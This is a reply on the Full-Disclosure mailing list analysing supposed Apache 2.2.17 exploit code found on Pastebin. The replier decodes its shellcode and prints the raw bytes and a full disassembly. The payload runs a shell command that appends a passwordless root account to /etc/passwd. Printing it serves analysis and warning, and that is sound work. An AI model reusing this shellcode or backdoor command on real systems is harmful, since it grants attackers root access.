Re: [Full-disclosure] Apache 2.2.17 exploit?
- To: "Darren Martyn" <d.martyn.fulldisclosure@xxxxxxxxx>
- Subject: Re: [Full-disclosure] Apache 2.2.17 exploit?
- From: nix@xxxxxxxxxxxxxxxx
- Date: Mon, 3 Oct 2011 17:57:35 +0300
> I regularly trawl Pastebin.com to find code - often idiots leave some 0day
> and similar there and it is nice to find.
>
> Well, seeing as I have no test boxes at the moment, can someone check this
> code in a VM? I am not sure if it is legit or not.
>
> http://pastebin.com/ygByEV2e
>
> Thanks :)
>
> ~Darren
I decoded the shellcode a bit. Looks like trash to me.
ë*^1À^ÈF^G^ÈF
^ÈFG^ÉvI^Í^^H^É^M^Í^^K^É^Q^ÉFU°^K^Éó^ÍNI^ÍVUÍ^ÀèÑÿÿÿ
/bin/sh#-c#/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >>
/etc/passwd#AAAABBBBCCCCDDDD
Here's the disassembly:
00000000 EB2A jmp short 0x2c
00000002 5E pop esi
00000003 31C0 xor eax,eax
00000005 884607 mov [esi+0x7],al
00000008 88460A mov [esi+0xa],al
0000000B 884647 mov [esi+0x47],al
0000000E 897649 mov [esi+0x49],esi
00000011 8D5E08 lea ebx,[esi+0x8]
00000014 895E4D mov [esi+0x4d],ebx
00000017 8D5E0B lea ebx,[esi+0xb]
0000001A 895E51 mov [esi+0x51],ebx
0000001D 894655 mov [esi+0x55],eax
00000020 B00B mov al,0xb
00000022 89F3 mov ebx,esi
00000024 8D4E49 lea ecx,[esi+0x49]
00000027 8D5655 lea edx,[esi+0x55]
0000002A CD80 int 0x80
0000002C E8D1FFFFFF call dword 0x2
00000031 2F das
00000032 62696E bound ebp,[ecx+0x6e]
00000035 2F das
00000036 7368 jnc 0xa0
00000038 232D63232F62 and ebp,[dword 0x622f2363]
0000003E 696E2F6563686F imul ebp,[esi+0x2f],dword 0x6f686365
00000045 207730 and [edi+0x30],dh
00000048 3030 xor [eax],dh
0000004A 743A jz 0x86
0000004C 3A30 cmp dh,[eax]
0000004E 3A30 cmp dh,[eax]
00000050 3A7334 cmp dh,[ebx+0x34]
00000053 66656D gs insw
00000056 3064653A xor [ebp+0x3a],ah
0000005A 2F das
0000005B 726F jc 0xcc
0000005D 6F outsd
0000005E 743A jz 0x9a
00000060 2F das
00000061 62696E bound ebp,[ecx+0x6e]
00000064 2F das
00000065 626173 bound esp,[ecx+0x73]
00000068 68203E3E20 push dword 0x203e3e20
0000006D 2F das
0000006E 657463 gs jz 0xd4
00000071 2F das
00000072 7061 jo 0xd5
00000074 7373 jnc 0xe9
00000076 7764 ja 0xdc
00000078 234141 and eax,[ecx+0x41]
0000007B 41 inc ecx
0000007C 41 inc ecx
0000007D 42 inc edx
0000007E 42 inc edx
0000007F 42 inc edx
00000080 42 inc edx
00000081 43 inc ebx
00000082 43 inc ebx
00000083 43 inc ebx
00000084 43 inc ebx
00000085 44 inc esp
00000086 44 inc esp
00000087 44 inc esp
00000088 44 inc esp
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/